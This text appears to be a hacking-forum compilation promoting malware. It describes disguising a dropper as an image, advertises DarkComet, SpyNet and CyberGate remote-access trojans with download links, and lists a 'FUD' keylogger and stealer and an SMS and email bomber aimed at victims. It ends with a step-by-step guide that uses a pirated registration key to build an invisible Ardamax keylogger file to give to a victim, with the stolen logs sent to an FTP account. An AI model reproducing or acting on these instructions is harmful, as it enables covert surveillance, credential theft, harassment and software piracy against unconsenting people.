    Once we have set up the C code to do as we want, we then run the makefile script. This will run our code through Borlands C compiler and build our program. The finished program is called dropper.exe. You can make this code have whatever icon you want. In this example, since we are trying to hide our virus in an image file we used an image icon.

    How to hide a virus


    Keep in mind that this is just one example of how people hide virus files inside other working media files. It is very important to have up to date AV (Anti Virus) software and if you are running a Windows computer ALWAYS have the computer show you the files extension!

    DARKCOMET RAT V3.0 - HACK ANY COMPUTER

    DarkComet 3.0 List improvement:

    By DarkCoderSc

    - 09/10/2010 : RC4 traffic encryption done , its encrypt all plain text and data flux with a RC4 encryption 256 bit , all your private data are now totally secured and DarkComet is impossible to flood / exploit .
    - 09/10/2010 : Dynamic RC4 256 bit Key added when you choose a password on DarkComet , thats mean if you want to be secured at 200% when you choose a password in server it will bind the actual RC4 key with your password then without the correct client password the data wont be correctly decrypted then nothing will work without your password.
    - 09/10/2010 : Now edit server settings are totally encrypted in RC4 256 bit too then its no more possible to reverse and read your personnal settings , again you are totally secured now ;)
    - 10/10/2010 : New column added in connection list (SIN) , now you can see the RAM usage/Total RAM and Free RAM.
    - 10/10/2010 : New column added in connection list (SIN) , now you can see the country code/country localisation(geo) and the default system langage
    - 10/10/2010 : New column added in connection list (SIN) , now you can see the first execution data/time of the server if it just been executed and not installed it display the current date/time.
    - 10/10/2010 : Now you can choose if you want to display the default language flag or the geo ip flag
    - 10/10/2010 : In OS collumn windows installed drive added (its where windows was installed)
    - 12/10/2010 : Clipboard manager have been recoded , now you can resize the textbox and listview for a better confort
    - 12/10/2010 : Two functions added in Clipboard manager , get the remote clipboard text in your clipboard , and send your clipboard text to the remote clipboard.
    - 12/10/2010 : Process Manager got now a real better compatibility on 64 bit OS, now it list all process
    - 12/10/2010 : Process Manager list the process 3x faster.
    - 12/10/2010 : If you use a password for protecting connection it will be display in tray icons with a locker to remind you !
    - 16/10/2010 : New toast style made , now you it display more information and have a better design.
    - 16/10/2010 : Clipboard copy problem fixed in password manager , also the whole system is more stable

    Download

    FUD KEYLOGGER WITH FUD CRYPTERS TO HACK ACCOUNTS

    Features of This Keylogger/Stealer:

    -
    Keylogger

    -Password Stealer (Opera,firefox,IE)
    -USB virus Spreader
    -Icon Changer
    -File binder
    -Taskmanager Kill
    -Cookie Löscher
    -Downloader
    -Website Blocker
    -Autostart with Windows
    -Fake Error
    -Antis
    -Assembly changer/Dropper
    -Neue Icons
    -Neue Stealer Regs
    -Build- bug wird gefixt
    -Stub-Bug wird gefixt
    -FUD
    -Cure
    -Firewall disabler
    -System Restore point deaktiviert
    -CMD deaktivert
    -Bat.REG Files Deaktivert
    -File Pumper
    -Opera+chrome stealer
    -Application stealer
    -Windoof Serial Stealer
    -PC Info stealer

    SPYNET 2.7 RAT - GHOST EDITION

    New features included:
    - Added optional connection limit.
    - Increased connection stability. Spy-Net is now as stable as SS-Rat.
    - Increased speed in filemanager list files and list drives.
    - Autostart on most features now.
    - Password retrieval has been improved.


    Features and Specs:
    - server around 280 kb, depending on if icon is selected, rootkit, upx compressed, etc
    - windows xp, vista and 7 compatible;
    - DNS Updater (for now working with No-IP. developing dyndns updater atm)
    - File Manger with a load full of options like FTP upload, set attributes to files, preview for images, etc etc etc;
    - Windows List;
    - Process List;
    - Device List;
    - Service List;
    - Registry Editor;
    - Installed Programs;
    - Active Ports List;
    - Remote Desktop;
    - Webcam capture;
    - Audio Capture;
    - Password Recovery Tool (with direct download to client or FTP logs);
    - Password Grabber;
    - Socks 4/5 proxy;
    - HTTP Proxy;
    - Open Webpage;
    - Download and Execute;
    - Send local files and run hidden or normally;
    - Remote Chat Client;
    - DOS Prompt;
    - Run cmd;
    - Clipboard Grabber;
    - Search for remote files and search on Password Recovery Tool;
    - Access to download folder, remote desktop screen shots and web capture from menu.
    - Encrypted traffic between Client and server;
    - a few extra options (restart, lock buttons and stuff....) and all the options related to server (uninstall, rename, etc etc etc);
    - add a new option for injection - wait for first browser to open. not the default but the first to start. seems useful in some cases.
    - Rootkit in beta stage and being developed. It will hide process name and startup keys that have SPY_NET_RAT as name. Tested under XP and working, being developed and tested on other OS's;
    - Connections Limit selector;
    - Binder,
    - Columns selector (u can choose which columns u wanna see details from in the client. ex: u can hide RAM info view or Ports info view or any other using right click on top of the columns);
    - Ability to choose either server is installed or not in remote computer.

    NOTICE:you cant update it spynet 2.6 to 2.7 its not compatible...

    Download SpyNet

    HACK COMPUTER USING CYBERGATE RAT

    What is CyberGate:

    CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continously getting developed by our experienced team.

    What it can do:

    CyberGate was built to be a tool for various possible applications, ranging from assisting Users with routine maintenance tasks, to remotely monitoring your Children, captures regular user activities and maintain a backup of your typed data automatically. It can also be used as a monitoring device for detecting unauthorized access.
    CyberGate achieves this though it's abundant array of features. A few of which are illustrated below:


    [+] Automatically map ports if your router supports uPnP;

    [+] Multi-Threaded : allowing for multiple clients to be connected, along with increased reliability.

    [+] Reverse Connection : Some of the listed advantages of a reverse connection -
    # Outgoing connections generally are less treating, and are less likely to be detected or blocked by a firewall, such as a router.
    # Since the remote's computer is connecting to the remote administrator, one does not need to know the remote's IP address in order to connect.

    # It is much easier to keep track of the computers the RAT is installed on, since they are all "calling home" by connecting to the remote administrator.

    [+] User Friendly GUI : The neat and simple GUI of CyberGate make this tool very easy to use and the simplest way to achieve yours goals.

    [+] Stealth : The various features of the server installation makes the server extremely customizable accord to each user's needs and requirements.

    [+] Keylogger : This tool can be used to find out what is happening on your computer while you are away, maintain a backup of your typed data.

    [+] Password recovery : It can be used to recover some of passwords that your forgot long time ago.

    [+] Tasks: CyberGate is able to create either tasks for the Client to perform on a specific time after being started or an individual remote whenever it connects back to CyberGate.

    [+] Connections tab: You can monitor all the connections and client performance from a connection log that will register actions and time /date for those actions.

    Download CyberGate

    EMAIL & SMS BOMBER 2011

    Latest email and sms bomber.



    New released SMS and email bomber that support almost all countries in the world, just follow the few steps and then begin your “bombing era”...
    • My Email address = You’r Email address
    • My Username = Username you use to login to your Mmail Service
    • My password = Password you use to login to you’r Mail Service
    • Email = Choose you’r email provider (Gmail, Hotmail, Yhaoo and Aol)
    • Phone# = Victims Phone Number don’t write country code eg. +46 +213 +123 and so on
    • Victims Provider = Choose a Provider that support the victims Country
    • Subject = Subject
    • Body = Message

    ARDMAX KEYLOGGER 3.0 - WITH REGISTRATION KEY

    Serial:- 
    Kimberley Ronald
    RGA3Y3A-M3D88-T3HU5-T28TM-G47A S-SFTD7-624JC

    Download The Ardamax Keylogger 2.85

    2- Now right-hand click it and click ‘Enter registration key…



    3-
    Enter the Name and password in the box fields...
    Name: Kimberley Ronald
    Key: RGA3Y3A-M3D88-T3HU5-T28TM-G47A S-SFTD7-624JC



    5-
    Once done click ‘Ok’ and you should get a pop-up saying ‘Registration code is accepted. Thank you for registration!


     
    II. Creating the Keylogger Remote file:

    1.
    Now your going to make the Keylogger Remote file (The thing you give to your victim). Click ‘Remote Installation…


     
    Click ‘Next’
    2. Now,you should see this.


     
    3. If you want to bind Keylogger Remote file with another application or file click the box that says ‘Append keylogger Remote file to file or another application’ and browse file or application that you want to bind it with.. I would prefer to skip this and bind the keylogger after creating the remote file.

    4.
    Now click ‘Additional components’ and tick ‘Installation Package Bilder’ like done in the screenshot.


     
    5. Now you should be at ‘Invisibility’, make sure all the boxes are ticked, then click ‘Next’.


     
    6. Now you should be at ‘Security’, click ‘Enable’ and put your password (it can be any password you like, make it something easy so you can remember). Once done, make sure all the boxes are ticked and click ‘Next’. Or else SkIp this also...


     
    7- Uncheck the update optiong...


     
    8. Ok, you should now be at ‘Options’, use setting like done in screenshots.You can also select it destruction date


     
    9. Ok, now you should be at ‘Control’, click the box that says ‘Send logs every’, now make it so it sends logs every 20 minutes, then where it says ‘Delivery’, un-tick ‘Email’ and tick ‘FTP’, then where it says ‘Include’ un-tick ‘Screenshots’, now un-tick the box where it says ‘Send only if log size exceeds’, once thats done, it should all look like it does in this screenshot:


     
    10. Now you should be at ‘FTP’, create a free account at http://www.drivehq.com then make sure your at ‘Online Storage’, then make a new folder called: Logs (this is where the logs are sent to when you keylogg someone), Now on your FTP on Ardamax Keylogger, where it says ‘FTP Host:’, put this:
    FTP.DriveHQ.com

    Now where it says ‘Remote Folder:’, put this: Logs
    Now where it says ‘Userame:’ and ‘Password:’, put your DriveHQ username and password, then it should look something like this:


     
    Now Click ‘Test’ and it should pop up like this.


     
    If not then see if the password and username is right.

    Once done, do NOT change your DriveHQ password or rename/delete the folder called ‘Logs’, if you do, the logs will not come through.


    11.
    You should now be at ‘Control’, un-tick ‘Enable Screenshots Capturing’ then click ‘Next’.


    12. Now you can change name and icon your Keylogger Engine as you want it to look like.


     
    Just click ‘Finish’.
    13. After you click ‘Finish’ you should see this:



    Now Your Remote File Is Created


    Thats it guyS Enjoy Hacking...